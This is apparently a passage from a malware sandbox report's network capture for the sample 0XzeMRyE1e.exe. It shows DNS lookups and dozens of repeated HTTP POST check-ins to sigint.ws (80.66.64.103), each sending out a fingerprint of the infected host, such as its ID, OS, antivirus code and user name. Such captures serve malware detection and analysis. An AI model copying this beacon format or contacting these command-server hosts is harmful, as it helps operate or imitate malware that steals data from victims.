                                                                              Jun 2, 2022 01:55:09.281564951 CEST4990780192.168.2.480.66.64.103
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 2, 2022 01:53:21.385699034 CEST | 192.168.2.4 | 8.8.8.8 | 0x1000 | Standard query (0) | north.ac | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:21.562596083 CEST | 192.168.2.4 | 8.8.8.8 | 0xce27 | Standard query (0) | north.ac | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:40.527017117 CEST | 192.168.2.4 | 8.8.8.8 | 0x4d6f | Standard query (0) | sigint.ws | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:41.007222891 CEST | 192.168.2.4 | 8.8.8.8 | 0x193c | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:42.065357924 CEST | 192.168.2.4 | 8.8.8.8 | 0x295f | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.731156111 CEST | 192.168.2.4 | 8.8.8.8 | 0xa75c | Standard query (0) | north.ac | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.912110090 CEST | 192.168.2.4 | 8.8.8.8 | 0x2583 | Standard query (0) | north.ac | A (IP address) | IN (0x0001)
Jun 2, 2022 01:55:02.223989964 CEST | 192.168.2.4 | 8.8.8.8 | 0xbc9f | Standard query (0) | t.me | A (IP address) | IN (0x0001)
Jun 2, 2022 01:55:26.241058111 CEST | 192.168.2.4 | 8.8.8.8 | 0x553a | Standard query (0) | mastodon.online | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 2, 2022 01:53:21.438299894 CEST | 8.8.8.8 | 192.168.2.4 | 0x1000 | No error (0) | north.ac |  | 172.67.152.230 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:21.438299894 CEST | 8.8.8.8 | 192.168.2.4 | 0x1000 | No error (0) | north.ac |  | 104.21.2.205 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:21.594549894 CEST | 8.8.8.8 | 192.168.2.4 | 0xce27 | No error (0) | north.ac |  | 172.67.152.230 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:21.594549894 CEST | 8.8.8.8 | 192.168.2.4 | 0xce27 | No error (0) | north.ac |  | 104.21.2.205 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:40.545897961 CEST | 8.8.8.8 | 192.168.2.4 | 0x4d6f | No error (0) | sigint.ws |  | 80.66.64.103 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:41.026652098 CEST | 8.8.8.8 | 192.168.2.4 | 0x193c | No error (0) | github.com |  | 140.82.121.3 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:42.084232092 CEST | 8.8.8.8 | 192.168.2.4 | 0x295f | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:42.084232092 CEST | 8.8.8.8 | 192.168.2.4 | 0x295f | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:42.084232092 CEST | 8.8.8.8 | 192.168.2.4 | 0x295f | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:42.084232092 CEST | 8.8.8.8 | 192.168.2.4 | 0x295f | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.759623051 CEST | 8.8.8.8 | 192.168.2.4 | 0xa75c | No error (0) | north.ac |  | 104.21.2.205 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.759623051 CEST | 8.8.8.8 | 192.168.2.4 | 0xa75c | No error (0) | north.ac |  | 172.67.152.230 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.934061050 CEST | 8.8.8.8 | 192.168.2.4 | 0x2583 | No error (0) | north.ac |  | 172.67.152.230 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:53:54.934061050 CEST | 8.8.8.8 | 192.168.2.4 | 0x2583 | No error (0) | north.ac |  | 104.21.2.205 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:55:02.246467113 CEST | 8.8.8.8 | 192.168.2.4 | 0xbc9f | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001)
Jun 2, 2022 01:55:26.260370970 CEST | 8.8.8.8 | 192.168.2.4 | 0x553a | No error (0) | mastodon.online |  | 95.216.4.252 | A (IP address) | IN (0x0001)
• north.ac
• github.com
• raw.githubusercontent.com
• t.me
• sigint.ws
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49759 | 172.67.152.230 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49766 | 140.82.121.3 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
Timestamp | kBytes transferred | Direction | Data


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              10192.168.2.44978480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:58.905730963 CEST3406OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.087666035 CEST | 3406 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              100 | 192.168.2.4 | 49874 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:56.482566118 CEST | 3490 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:56.665231943 CEST | 3490 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              101 | 192.168.2.4 | 49875 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:56.892898083 CEST | 3491 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:57.073848009 CEST | 3491 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              102 | 192.168.2.4 | 49876 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:57.279397011 CEST | 3492 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:57.464597940 CEST | 3492 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              103 | 192.168.2.4 | 49878 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:57.842865944 CEST | 3511 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.024713993 CEST | 3512 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              104 | 192.168.2.4 | 49880 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:58.245913982 CEST | 3530 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.427521944 CEST | 3531 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              105 | 192.168.2.4 | 49881 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:58.640327930 CEST | 3531 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.824417114 CEST | 3532 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              106 | 192.168.2.4 | 49884 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:59.033834934 CEST | 3546 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.216670990 CEST | 3563 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              107 | 192.168.2.4 | 49885 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:59.420912981 CEST | 3579 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.605551004 CEST | 3579 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              108 | 192.168.2.4 | 49886 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:59.808424950 CEST | 3580 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.993267059 CEST | 3580 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              109 | 192.168.2.4 | 49887 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:00.209739923 CEST | 3581 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:00.393475056 CEST | 3581 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              11 | 192.168.2.4 | 49785 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:59.351850033 CEST | 3407 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.532696009 CEST | 3407 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              110 | 192.168.2.4 | 49888 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:00.609327078 CEST | 3582 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:00.790986061 CEST | 3582 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              111 | 192.168.2.4 | 49889 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:00.995563984 CEST | 3583 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:01.179130077 CEST | 3583 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              112 | 192.168.2.4 | 49890 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:01.415532112 CEST | 3584 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:01.599328041 CEST | 3584 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              113 | 192.168.2.4 | 49891 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:01.891788006 CEST | 3585 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:02.072062969 CEST | 3585 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              114 | 192.168.2.4 | 49892 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:55:02.407883883 CEST | 3586 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
